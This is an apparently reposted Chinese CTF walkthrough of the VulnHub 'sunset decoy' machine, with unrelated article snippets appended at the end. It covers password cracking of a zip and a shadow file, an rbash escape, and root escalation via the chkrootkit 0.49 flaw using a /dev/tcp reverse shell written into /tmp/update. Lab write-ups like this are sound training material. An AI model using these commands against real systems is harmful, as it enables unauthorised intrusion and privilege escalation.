vulnhub:sunset decoy

靶機下載地址https://www.vulnhub.com/entry/sunset-decoy,505/

滲透過程

簡單信息收集

nmap 192.168.56.0/24 -Pn
# 確定靶機ip:192.168.56.121
nmap 192.168.56.121 -A -T4
# 得到開放端口22,80

在80端口得到save.zip,需要密碼解壓。

john破解壓縮包密碼

zip2john save.zip > hash.txt
john hash.txt

得到密碼manuel

shadow密碼破解

解壓后得到/etc/文件夾,內有shadow文件,嘗試破解用戶密碼。

root外存在用戶296640a3b825115a47b68fc44501c828

296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

密文是$6開頭,所以加密方式是SHA-512

網上找到一個破解腳本。

# coding=utf-8
import crypt
?
shadow_file = "/etc/shadow" ? ? ? ? ? ? ? ? ? # 獲取系統密碼路徑
password_file = "/usr/share/wordlists/rockyou.txt" ?  # 自己的密碼文件,里面放的是明文密碼
?
?
def get_pass(shadow_file):used = {} ? ? ? ? ? ? ? ? ? ? ? ? ? # key是用戶,value是對應的密文f = open(shadow_file, "r") ? ? ?  # 讀取系統密碼文件userline = f.readlines() ? ? ? ? ?  # 將該文件轉換為列表格式f.close()for item in userline: ? ? ? ? ? ? ? ?  # 遍歷列表里的內容if len(item.split(":")[1]) > 3: ?  # 以":"分割,取第二個元素的長度,也就是完整密文值的長度,如果大于3,我們認定它有密碼,把它取出來used[item.split(":")[0]] = item.split(":")[1]  # 我們將取出的密文給了相應的用戶,這里的used[i.split(":")[0]]是字典的key,也就是系統中的用戶名,后面的i.split(":")[1]是用戶名后的加密密文return used
?
?
# 提取自己的密碼文件中的明文密碼
def look_d(password_file):f = open(password_file, 'r')mwlist = f.readlines() ? ? ? ? ? ?  # 將讀取的內容轉換為列表f.close()for i, item in enumerate(mwlist):mwlist[i] = item.strip("\n") ?  # 去除每一行的換行符return mwlist  # 返回這個列表
?
?
# 根據密文是否相同判斷出對應的用戶和密碼
def main(user_passfile, zidian):used = get_pass(user_passfile) ? ?  # 獲取用戶和對用的加密密文mingwen = look_d(zidian) ? ? ? ? ?  # 獲取所有的明文密碼for user in used:passwd = used[user] ? ? ? ? ? ? # 一次遍歷每個用戶的密文salt = "$6$" + passwd.split("$")[2]  # 獲取鹽值for passwdmw in mingwen: ? ? ?  # 遍歷系統中的每個完整密文if passwd == crypt.crypt(passwdmw.rstrip(), salt):  # 如果我們猜想的密文與系統中的密文相同,輸入它的用戶名和密碼print("userName:%s passWord:%s" % (user, passwdmw.rstrip()))
?
?
if __name__ == "__main__":main(shadow_file, password_file)

get密碼:server


rbash逃逸

ssh遠程登錄后發現是rbash,即restricted shell,受限制的bash,體現為

  • 不能使用cd命令。

  • 不能使用>,<>,>>等重定向操作符。

  • 不能設置或取消環境變量。

rbash逃逸有很多種方式,這里測試后適用的是ssh登錄時逃逸 (借助-t遠程在遠程機器上運行腳本)

ssh 296640a3b825115a47b68fc44501c828@192.168.56.121 -t "bash --noprofile"# 不加載用戶配置
# -t "bash --noprofile"

rbash逃逸成功后發現仍、cat、vim等命令依舊無法使用,

需要配置環境變量。

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

完美解決,get user.txt。

用戶目錄內容如下:

存在一個root用戶創建的honeypot.decoy可執行文件,他有8個功能,其中除選項五之外都是簡單易懂的功能,選擇選項五后無回顯,不清楚具體作用。

rbash逃逸部分參考rbash逃逸大全-先知社區 (aliyun.com)

chkrootkit提權

SV-502/目錄下的logs文件中發現一個可疑點,chkrootkit,這是一個后門檢測工具。

搜索發現,chkrootkit 0.49版本有漏洞。searchsploit漏洞庫搜索一下,searchsploit chkrootkit,鎖定到33899.txt。

了解后知道,滿足兩點即可利用該漏洞獲取root權限:

  • 如果目標機器管理員會定期運行chkrootkit。

  • 非root用戶對/tmp/目錄有寫權限。(可以再該目錄下創建有執行權限update文件)。

此處具體提權流程如下:

  1. 在tmp目錄下創建update文件,并寫入反彈shell。

    touch /tmp/update
    ?
    chmod +x /tmp/update
    ?
    echo "bash -c 'exec bash -i &>/dev/tcp/ip/4444 <&1'" > /tmp/update
  2. 運行chkrootkit,首先查看是否有這個定時任務?;想到用戶目錄下那個可執行文件honeypot.decoy,執行后有8個選項,其中第五個選項意味不明Launch an AV Scan.,但是根據Scan有理由懷疑該選項就是執行chkrootkit。簡單測試一下,選擇選項五后使用ps -aux | grep chk驗證發現運行了chkrootkit??

? ?

因此,提權操作如下:

# 靶機
./honeypot.decoy
5
# 攻擊機
nc -lvvp 4444

提權成功。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/901208.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/901208.shtml
英文地址,請注明出處:http://en.pswp.cn/news/901208.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

代碼學習總結(一)

代碼學習總結&#xff08;一&#xff09; 這個系列的博客是記錄下自己學習代碼的歷程&#xff0c;有來自平臺上的&#xff0c;有來自筆試題回憶的&#xff0c;主要基于 C 語言&#xff0c;包括題目內容&#xff0c;代碼實現&#xff0c;思路&#xff0c;并會注明題目難度&…

OSPF的接口網絡類型【復習篇】

OSPF在不同網絡環境下默認的不同工作方式 [a3]display ospf interface g 0/0/0 # 查看ospf接口的網絡類型網絡類型OSPF接口的網絡類型&#xff08;工作方式&#xff09;計時器BMA&#xff08;以太網&#xff09;broadcast &#xff0c;需要DR/BDR的選舉hello&#xff1a;10s…

PHM學習軟件|PHM預測性維護系統

使用步驟教程如下 1、登錄 用戶名&#xff1a;52phm 密碼&#xff1a;xxx &#xff08;區別在于不同用戶密鑰不一樣&#xff09; 2、上傳需要分析的數據集 支持數據集格式&#xff1a;csv、xlsx、xls、mat、json 3、主題1&#xff1a;機械參數計算 計算軸承、齒輪、皮帶的…

MySQL MVCC 機制詳解

MySQL MVCC 機制詳解 1. MVCC 基本概念 MVCC 是一種并發控制的方法&#xff0c;主要用于數據庫管理系統&#xff0c;允許多個事務同時讀取數據庫中的同一個數據項&#xff0c;而不需要加鎖&#xff0c;從而提高了數據庫的并發性能。 ┌──────────────────…

Model Context Protocol (MCP) - 嘗試創建和測試一下MCP Server

1.簡單介紹 MCP是Model Context Protocol的縮寫&#xff0c;是Anthropic開源的一個標準協議。MCP使得大語言模型可以和外部的數據源&#xff0c;工具進行集成。當前MCP在社區逐漸地流行起來了。同時official C# SDK(倉庫是csharp-sdk) 也在不斷更新中&#xff0c;目前最新版本…

(三)行為模式:12、訪問者模式(Visitor Pattern)(C++示例)

目錄 1、訪問者模式含義 2、訪問者模式的UML圖學習 3、訪問者模式的應用場景 4、訪問者模式的優缺點 5、訪問者模式C實現的實例 1、訪問者模式含義 訪問者模式&#xff08;Visitor Pattern&#xff09;是一種行為型設計模式&#xff0c;它允許將一個作用于某對象結構中的各…

windows安卓子系統wsa隱藏應用列表的安裝激活使用

Windows 11 安卓子系統應用部署全攻略 windows安卓子系統wsa隱藏應用列表的安裝激活使用|過檢測核心前端 在 Windows 11 系統中&#xff0c;安卓子系統為用戶帶來了在電腦上運行安卓應用的便利。經過一系列的操作&#xff0c;我們已經完成了 Windows 11 安卓子系統的底層和前端…

Elasticsearch 集群搭建

一、集群規劃 1.1 節點角色規劃 節點類型配置要求推薦數量Master節點低磁盤、中等CPU/內存3&#xff08;奇數防止腦裂&#xff09;Data節點高磁盤、高內存、多核CPU根據數據量擴展Coordinating節點高CPU/內存、低磁盤2&#xff08;可選&#xff09; 1.2 硬件建議 內存&…

React 響應事件

開發環境&#xff1a;Reacttsantd 使用 React 可以在 JSX 中添加 事件處理函數。其中事件處理函數為自定義函數&#xff0c;它將在響應交互&#xff08;如點擊、懸停、表單輸入框獲得焦點等&#xff09;時觸發。 學習內容 1.編寫事件處理函數的不同方法 2.如何從父組件傳遞事件…

SQL基礎入門:從CRUD到JOIN再到索引(通俗易懂版)

一、為什么需要SQL&#xff1f; 想象你在管理一個圖書館&#xff1a; 傳統方法&#xff1a;手動記錄每本書的位置、借閱者、歸還日期SQL方法&#xff1a;用數據庫系統自動管理&#xff0c;快速查詢《Java編程思想》在哪個書架 SQL&#xff08;Structured Query Language&…

MINIQMT學習課程Day11

現在開始進行策略的交易買賣分析&#xff1a; 還是之前的步驟&#xff0c;打開qmt&#xff0c;選擇獨立交易&#xff0c; 之后使用pycharm&#xff0c;編寫py文件 導入包&#xff1a; import time, datetime, traceback, sys from xtquant import xtdata from xtquant.xttr…

# 實時人臉性別與年齡識別:基于OpenCV與深度學習模型的實現

實時人臉性別與年齡識別&#xff1a;基于OpenCV與深度學習模型的實現 在當今數字化時代&#xff0c;計算機視覺技術正以前所未有的速度改變著我們的生活與工作方式。其中&#xff0c;人臉檢測與分析作為計算機視覺領域的重要分支&#xff0c;已廣泛應用于安防監控、智能交互、…

Python Cookbook-5.14 給字典類型增加排名功能

任務 你需要用字典存儲一些鍵和“分數”的映射關系。你經常需要以自然順序(即以分數的升序)訪問鍵和分數值&#xff0c;并能夠根據那個順序檢查一個鍵的排名。對這個問題&#xff0c;用dict 似乎不太合適。 解決方案 我們可以使用 dict 的子類&#xff0c;根據需要增加或者重…

十四種邏輯器件綜合對比——《器件手冊--邏輯器件》

目錄 邏輯器件 簡述 按功能分類 按工藝分類 按電平分類 特殊功能邏輯器件 應用領域 詳盡闡述 1 邏輯門 一、基本概念 二、主要類型 三、實現方式 四、應用領域 2 反相器 工作原理 基本功能 主要應用 常見類型 特點 未來發展趨勢 3 鎖存器 基本概念 工作原理 主要類型…

如何更改wsl2中的ubuntu默認安裝位置

先前的一篇文章提到了如何更改wsl里面ubuntu的home目錄&#xff0c;wsl裝ubuntu的home目錄在哪&#xff0c;如何更改home&#xff1f;_wsl安裝的ubuntu在哪里-CSDN博客 這次是要更改wsl中ubuntu的安裝目錄&#xff0c;畢竟默認安裝到c盤下會占用不少空間的。 從微軟商店get后…

最近在工作中感受到了設計模式的重要性

之前了解設計模式&#xff1a;只是應付一下面試 在之前一年多的工作中也沒遇到使用場景 最近在搭建驗證環境的時候&#xff0c;才發現這玩意這么重要 首先是設計模式的使用場景一定是在很復雜繁瑣的場景下進行的 之所以說是復雜/繁瑣的場景&#xff0c;因為一些場景也許邏輯不難…

Python深度學習基礎——卷積神經網絡(CNN)(PyTorch)

CNN原理 從DNN到CNN 卷積層與匯聚 深度神經網絡DNN中&#xff0c;相鄰層的所有神經元之間都有連接&#xff0c;這叫全連接&#xff1b;卷積神經網絡 CNN 中&#xff0c;新增了卷積層&#xff08;Convolution&#xff09;與匯聚&#xff08;Pooling&#xff09;。DNN 的全連接…

Linux 第三講 --- 基礎指令(三)

前言&#xff1a; 在前面我們已經講了有十幾個Linux的基礎指令&#xff0c;今天我們再補充幾個常用的基礎指令&#xff0c;為后面的學習做準備 。 目錄 前言&#xff1a; 一、兩個與時間相關的指令 1.date指令 演示 &#xff1a; 時間戳 設置時間 2、cal指令 演示&#x…

基于SiamFC的紅外目標跟蹤

基于SiamFC的紅外目標跟蹤 1,背景與原理2,SiamFC跟蹤方法概述2.1 核心思想2.2 算法優勢3,基于SiamFC的紅外跟蹤代碼詳解3.1 網絡定義與交叉相關模塊3.2 SiamFC 跟蹤器實現3.3 主程序:利用 OpenCV 實現視頻跟蹤4,總結與展望在紅外監控、無人機防御以及低光照場景中,紅外圖…

Odoo 部署本地 把現時的excel計算表格部署上odoo 教程

要將現有的 Excel 計算表格部署到 Odoo 平臺上&#xff0c;您可以按照以下步驟進行操作&#xff1a; 將 Excel 表格中的數據轉移到 Odoo 模塊中&#xff1a;首先&#xff0c;您需要將 Excel 表格中的數據導出為 CSV 格式&#xff0c;然后可以使用 Odoo 的數據導入功能將這些數據…